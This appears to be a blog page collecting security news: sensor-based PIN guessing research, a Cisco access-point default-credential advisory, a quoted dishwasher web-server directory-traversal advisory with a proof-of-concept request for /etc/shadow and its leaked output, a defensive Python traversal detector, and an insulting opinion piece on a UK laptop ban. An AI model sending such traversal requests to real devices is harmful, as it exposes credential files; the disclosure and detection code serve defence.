Analysing the movement of the device as we type in information, they have shown it is possible to crack four-digit PINs with a 70% accuracy on the first guess – 100% by the fifth guess – using just the data collected via the phone’s numerous internal sensors.
[…]
“Most smart phones, tablets, and other wearables are now equipped with a multitude of sensors, from the well-known GPS, camera and microphone to instruments such as the gyroscope, proximity, NFC, and rotation sensors and accelerometer.

“But because mobile apps and websites don’t need to ask permission to access most of them, malicious programs can covertly ‘listen in’ on your sensor data and use it to discover a wide range of sensitive information about you such as phone call timing, physical activities and even your touch actions, PINs and passwords.

“More worrying, on some browsers, we found that if you open a page on your phone or tablet which hosts one of these malicious code and then open, for example, your online banking account without closing the previous tab, then they can spy on every personal detail you enter.

“And worse still, in some cases, unless you close them down completely, they can even spy on you when your phone is locked.

“Despite the very real risks, when we asked people which sensors they were most concerned about we found a direct correlation between perceived risk and understanding. So people were far more concerned about the camera and GPS than they were about the silent sensors.”

Source: Are your sensors spying on you?

Cisco Aironet 1830 Series and 1850 Series Access Points Mobility Express with hardcoded passwords

The vulnerability is due to the existence of default credentials for an affected device that is running Cisco Mobility Express Software, regardless of whether the device is configured as a master, subordinate, or standalone access point. An attacker who has layer 3 connectivity to an affected device could use Secure Shell (SSH) to log in to the device with elevated privileges. A successful exploit could allow the attacker to take complete control of the device.

cisco advisory

Miele Professional PG 8528 dishwasher insecure – Web Server Directory Traversal

Details:
========
The corresponding embedded webserver "PST10 WebServer" typically listens
on port 80 and is prone to a directory traversal attack, therefore an
unauthenticated attacker may be able to exploit this issue to access
sensitive information to aid in subsequent attacks.

Proof of Concept:
=================
~$ telnet 192.168.0.1 80
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
GET /../../../../../../../../../../../../etc/shadow HTTP/1.1

HTTP/1.1 200 OK
Date: Wed, 16 Nov 2016 11:58:50 GMT
Server: PST10 WebServer
Content-Type: application/octet-stream
Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT
Content-disposition: attachment; filename="./etc/shadow"
Accept-Ranges: bytes
Content-Length: 52

root:$1$$Md0i[…snip…]Z001:10933:0:99999:7:::

Fix:
====
We are not aware of an actual fix.

Full disclosure

Why would anyone want a webserver on their dishwasher?!
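Since there is no vendor fix, the two useful things to have are a way to spot requests like the one in the PoC in web or proxy logs, and the server-side check that embedded web servers of this kind get wrong. The code below is an added example, not from the advisory or from Miele; the request line is the one quoted above, the other inputs are constructed variants (double encoding, backslashes) that a filter must also catch. The path check is string-only so it runs without a real document root.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote, urlsplit

# Request line from the advisory's PoC.
ADVISORY_REQUEST = "GET /../../../../../../../../../../../../etc/shadow HTTP/1.1"


def request_path(request_line: str) -> str:
    """Pull the request-target out of an HTTP request line."""
    parts = request_line.split()
    if len(parts) < 2:
        raise ValueError("not an HTTP request line")
    return parts[1]


def decoded_path(target: str) -> str:
    """Drop the query string, percent-decode twice (catches %252e%252e) and
    treat backslashes as separators: the usual tricks for slipping '..' past
    a naive string filter."""
    path = urlsplit(target).path
    return unquote(unquote(path)).replace("\\", "/")


def escapes_root(target: str) -> bool:
    """True if the path climbs above the document root at any point.
    Walks segments instead of normalising first, so '/a/../../x' is rejected
    even though normpath would quietly turn it into '/x'."""
    depth = 0
    for seg in decoded_path(target).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def resolve_under_root(docroot: str, target: str) -> Optional[str]:
    """Server-side counterpart: map a request-target to a path that stays
    under docroot, or None (answer 400/403). A real server should also
    realpath() the result so a symlink inside the root cannot point outside it."""
    if escapes_root(target):
        return None
    rel = posixpath.normpath("/" + decoded_path(target)).lstrip("/")
    root = docroot.rstrip("/")
    return posixpath.join(root, rel) if rel else root


if __name__ == "__main__":
    # Constructed log lines: one from the PoC, one harmless, one double-encoded.
    for line in (ADVISORY_REQUEST,
                 "GET /css/../index.html HTTP/1.1",
                 "GET /%252e%252e/etc/passwd HTTP/1.1"):
        target = request_path(line)
        print(f"{'TRAVERSAL' if escapes_root(target) else 'ok':9s} {target} -> {resolve_under_root('/srv/www', target)}")
```

For the dishwasher itself the practical mitigation is network-level: keep port 80 on the appliance off any network that untrusted hosts can reach, and log the requests the detector above flags.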

UK flight ban on electronic devices announced – copying Trumpist insanity

The UK government has announced a cabin baggage ban on laptops and tablets on direct flights to the UK from Turkey, Lebanon, Jordan, Egypt, Tunisia and Saudi Arabia.

The ban follows a similar move in the US, where officials say bombs could be hidden in a series of devices.

Downing Street said it was “necessary, effective and proportionate”.

The government has not given a start-date for the ban, but says airlines are “in the process of implementing it”.

The ban applies to any device larger than 16cm long, 9.3cm wide or 1.5cm deep. It includes smart phones, but most fall inside these limits.

Any affected device, including e-readers, will need to be placed into hold luggage.

Source: UK flight ban on electronic devices announced – BBC News

This looks like a bit of the government being “Seen to do Something(tm)” even if that something is incredibly useless and hinders passengers, like the ban on liquids. It also looks very much like the UK is in the pocket of the US, which looks worse now that it’s being run by wealth raping clowns.